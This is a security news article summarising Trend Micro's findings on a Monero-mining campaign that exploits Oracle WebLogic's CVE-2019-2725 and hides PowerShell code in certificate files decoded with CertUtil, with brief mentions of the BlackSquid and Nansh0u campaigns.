The trend of exploiting malware which hides crypto miner bots or program has been started in the past few years and has become one of the most popular ways to leverage other’s processing power to mine cryptocurrency. Recently, a security advisory was released for CVE-2019-2725, a deserialization vulnerability involving the widely used Oracle WebLogic Server. In April 2019, Trend Micro detected a series of attacks that leveraged EternalBlue and PowerShell to deliver a Monero cryptocurrency miner. The reports were also pop up on the SANS ISC InfoSec forums regarding CVE-2019-2725 which was already in operation to install cryptocurrency miner, Monero miner to be exact. After getting confirmation from the Trend Micro™ Smart Protection Network™ regarding the reports, it is come to know that the mentioned malware hides its malicious codes in certificate files as an obfuscation tactic.
As per Trend Micro’s discovery, the Monero miner campaign begins by exploiting CVE-2019-2725 on the victim’s computer. Then the malware will exploit CVE-2019-2725 to execute a command for implementing a series of routines. First, the PowerShell script would be used to download certificate files from its command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer.
It will then put CertUtil on work, a component that decodes the certificate file to ultimately reveal a PowerShell command in Windows, to decrypt the file. This resource downloads and executes another PowerShell script from memory that, in turn, downloads and executes various files. The downloadable files will include Sysupdate.exe, the payload for the Monero miner, Config.json, the config file for the XMR miner, Networkservice.exe, possibly used for the propagation and exploitation of WebLogic, Sysguard .exe that serves as the watchdog for the miner process, Update.ps1, a PowerShell script that executes every 30 seconds and Clean.bat to deletes other components.
This isn’t the only case reported regarding a Monero miner in recent months. Previously, Trend Micro discovered BlackSquid, a totally new malware which was capable of exploiting eight notorious vulnerabilities including EternalBlue and DoublePulsar to install the XMRig Monero-mining malware. The Nansh0u crypto mining campaign in May 2019 infected more than 50,000 servers by exploiting vulnerabilities, as reported by Guardocore Labs.
Trend Micro, in its official blog post, has also suggested several ways to get rid of these malwares and how to stay protected against them. The solution includes their own malware protection suit and a few other precautions that users should be aware of.